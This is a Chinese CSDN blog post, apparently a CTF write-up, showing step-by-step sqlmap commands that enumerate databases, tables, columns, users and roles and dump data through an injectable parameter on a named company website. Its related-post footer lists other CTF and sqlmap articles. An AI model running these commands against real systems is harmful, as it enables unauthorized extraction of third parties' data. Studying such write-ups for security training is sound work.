write up::web 实战2-注入 --sqlmap注入版

最新推荐文章于 2020-10-25 23:50:36 发布
最新推荐文章于 2020-10-25 23:50:36 发布
阅读量235 收藏
点赞数
分类专栏: CTF
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/tb_youth/article/details/103390020
版权

在这里插入图片描述

0x00根据注入点爆出数据库

sqlmap -u http://www.kabelindo.co.id/readnews.php?id=28 --dbs

在这里插入图片描述

0x01根据数据库爆出表名

sqlmap -u http://www.kabelindo.co.id/readnews.php?id=28 --tables -D u9897uwx_kabel

在这里插入图片描述

0x02练点其他的

1.查找某张表的字段信息

比如这里查找最后一张表(tbnomax)的字段信息

sqlmap -u http://www.kabelindo.co.id/readnews.php?id=28 --columns -T tbnomax

在这里插入图片描述

2.提取整个表的具体内容

sqlmap -u http://www.kabelindo.co.id/readnews.php?id=28 --dump  -T tbnomax

在这里插入图片描述

3.敏感字段进行16进制编码

sqlmap -u http://www.kabelindo.co.id/readnews.php?id=28 --columns -T tbnomax --hex

4.查找用户

sqlmap -u http://www.kabelindo.co.id/readnews.php?id=28 --users

在这里插入图片描述

5.提取所有信息

sqlmap -u http://www.kabelindo.co.id/readnews.php?id=28 -a

6.查看用户角色信息

 sqlmap -u http://www.kabelindo.co.id/readnews.php?id=28 --roles

在这里插入图片描述

end~

Leo Bliss
关注
专栏目录
网络安全最新网络安全-sqlmap学习笔记_sqlmap --no-cast
2301_82242964的博客
05-04 687
检测和利用SQL注入的工具。sqlmap官网sqlmapWiki本文参考用户手册,有删减,算是低创,但并非完全翻译,有包含自己的抓包及部分使用sqlmap注入的内容,sqlmap实战在文末链接。--prefix和--suffix在某些情况下,仅当用户提供要添加到注入有效负载的特定后缀时,漏洞参数才可利用。当用户已经知道查询语法并想通过直接提供注入有效载荷前缀和后缀来检测和利用SQL注入时,这些选项很方便出现的另一种情况就会出现。为了检测和利用此SQL注入,您可以让sqlmap 在检测阶段为您检测边界。
红队专题-渗透工具-sqlmap
aming小老弟
01-29 2万+
目标对象 请求 优化 —线程。
攻防世界 web2 writeup
tothemoon的博客
03-04 232
打开页面就是源码,结合注释里的提示,这是一道代码审计的题。根据给出的加密方法将$miwen还原出来。 先解释一下里面的几个函数: strrev($str); //反转str字符串 substr($_o,$_0,1); //返回的字符串 取头不取尾 在这里是的作用是从头到尾一个一个取出字符 ord($_c)+1; //返回字符串的ascii然后加1 chr($__); //将...
BugkuCTF-web进阶-实战2-注入 writeup
会下雪的晴天
07-14 1476
题目描述 解题传送门:http://www.kabelindo.co.id/ 解题思路 打开链接后得到个这个页面,注入,,,我一开始在搜索框内随意试试,发现没什么用,抓包也没啥结果。然后就逛逛这个网站看看哪里有注入点,找了一会,在页面的About-News里面发现数字型注入,话不多说,开始 注入嘛,老套路,两种方法 法一、手工注入 猜字段http://www.kabelindo.co....
write up:web 实战2-注入--sql注入(手工注入详细
tb_youth的博客
12-03 616
0x00查找注入点 我是通过展开html标签来找注入点的 注入点 www.kabelindo.co.id/readnews.php?id=28 0x01 手动注入 先确定字段数目 先测试3,没有问题 再测试6,出错 再测试5,id=28时,不知道是不是我网的问题加载的很慢,我换成id=1进行测试,发现响应没有问题 这就确定了字段有5个 可以进一步验证: 查一下数据库名 查一下数据...
Web安全Day1 - SQL注入实战攻防
hongrisec的博客
02-20 3164
声明:文中所涉及的技术、思路和工具仅供以安全为目的的学习交流使用,任何人不得将其用于非法用途以及盈利等目的,否则后果自行承担! 本专题文章导航 1.Web安全Day1 - SQL注入实战攻防 https://mp.weixin.qq.com/s/zP0MZNhnZG_S9aoHDXzvWA 1. SQL注入 1.1 漏洞简介 结构化查询语言(Structured Query Language...
注入&Sqlmap
DebbieLi_Ca的博客
10-25 629
中心主题 sqlmap SQLMap介绍 1.Sqlmap介绍 2.Sqlmap环境安装 3.sqlmap下载 sqlmaap本查看 sqlmap获取目标 1.sqlmap直连数据库 -d表示直连 –banner 获取banner信息 2.sqlmap URL探测 3.sqlmap文件读取目标 可以探测多个URL 4.sqlmap google批量注入 sqlmap请求参数设置 Sqlmap设置HTTP方法 get和put POST在请求的时候,服
南邮CTF-WEB-write-up 教程详细解说
残阳泼茶香的博客
03-20 3485
单身一百年也没用 Download~! COOKIE MYSQL sql injection 3 /x00 bypass again 变量覆盖 PHP是世界上最好的语言 伪装者 Header 上传绕过 SQL注入1 pass check 起名字真难 密码重置 php 反序列化 sql injection 4 综合题 system SQL注入2 综合题2 注入实战1 密码重置2 ...
Bugku web进阶 实战2-注入
qq_33567663的博客
11-13 754
访问网址一一查看所链接,发现About-news存在可能注入的点,http://www.kabelindo.co.id/readnews.php?id=25 burp抓包另存为txt文件,sqlmap爆破 获取flag    ...
SQL注入实战————2、SQLmap中的temper使用
Fly_鹏程万里
05-06 2669
SQLmap——tamper注入靶机地址:http://219.153.49.228:42272/show.php?id=MQ==首先可以看到该URL中存在一个参数“MQ==”,从参数的格式来看是通过了base64进行了加密,那么我们可以对其进行base64解密发现解密之后的参数为1,这种类型的注入除了和我们以前的普通注入相比只是多了一个“base64”加密的过程,下面使用sqlmap的tampe...
bugku web题总结
h0ryit的博客
06-12 1661
陆陆续续将bugku的web题刷了一大半,剩下的都是分比较高的难点的题,做题过程中遇到了很多的问题,大部分题就没离开过write up,不过还是学到了很多,因此想做一个总结。 线索收集 拿到一个ctf题的第一步就是收集信息,特别是一些隐藏的提示信息,否则会寸步难行。 常见的信息点 网页文档的DOM信息 网页注释 有些题会在网页注释中给出提示信息,比如给出一部分源码之类的...
bugku web5 (jsFuck代码)
wssmiss的博客
07-21 744
题目: 分析 点击提交后出现 查看网页源代码,发现一段jsFuck脚本 在控制台运行jsfuck脚本 拿到flag
bugkuCTF Writeup (Web)36-40
Troublor的博客
02-01 3139
求getshell 文件上传绕过 上传一个php文件 用burp抓包 头部的Content-Type改成Multipart/form-data大小写绕过 请求内容里的Content-Type改成image 文件名改成php5 就绕过了 不太明白Multipart/form-data这里为什么变成大写能绕过,网上查也没查到,似乎并没有人关心multipart/form-dat
CTF [强网杯 2019]随便注 Writeup 堆叠注入
baynk的博客
03-31 1470
讲道理,最不虚的就是注入了。 随意加上单引号。 单引号闭合,尝试1' and 1=2 # 无回显,应该成功执行了,再来1=1确认下。 又有报错信息,想着直接上updatexml()。 结果报错,又试了exp()和extractvalue(),结果exp()到是能用,extractvalue()直接报无函数 。。。 不过有函数也没意义阿。因为select也被检测了,尝试了若干方法绕过后,放...
报错注入常用函数
qq_43238111的博客
05-19 4005
常用的三种报错函数 1.原理 在 MYSQL 中使用一些指定的函数来制造报错,后台没有屏蔽数据库报错信息, 在语法发生错误会输出在前端,从而从报错信息中获取设定的信息。 select/insert/update/delete 都可以使用报错来获取信息。 2.步骤 第一步:先判断是否存在漏洞 第二步:构造错误的语法,使用对应的报错函数: updatexml(),extractvalue(),floor() ,exp() 第三步:爆表名 第四步:爆字段 第五步:爆数据名 第六步:报数据值 3.函数
web-安全-sqlmap检索DBMS信息
weixin_45905671的博客
02-21 135
sqlmap检索DBMS信息 sqlmap检索DBMS banner 获取后端数据库banner信息 参数 --banner或者-b sqlmap检索DBMS当前数据库 获取当前数据库名 参数 --current-db sqlmap检索DBMS当前主机名 获取主机名 参数 --hostname sqlmap检索DBMS用户信息 sqlmap探测当前用DBA 探测当前用户是否是数据库管理员 参数 -...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

Leo Bliss

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值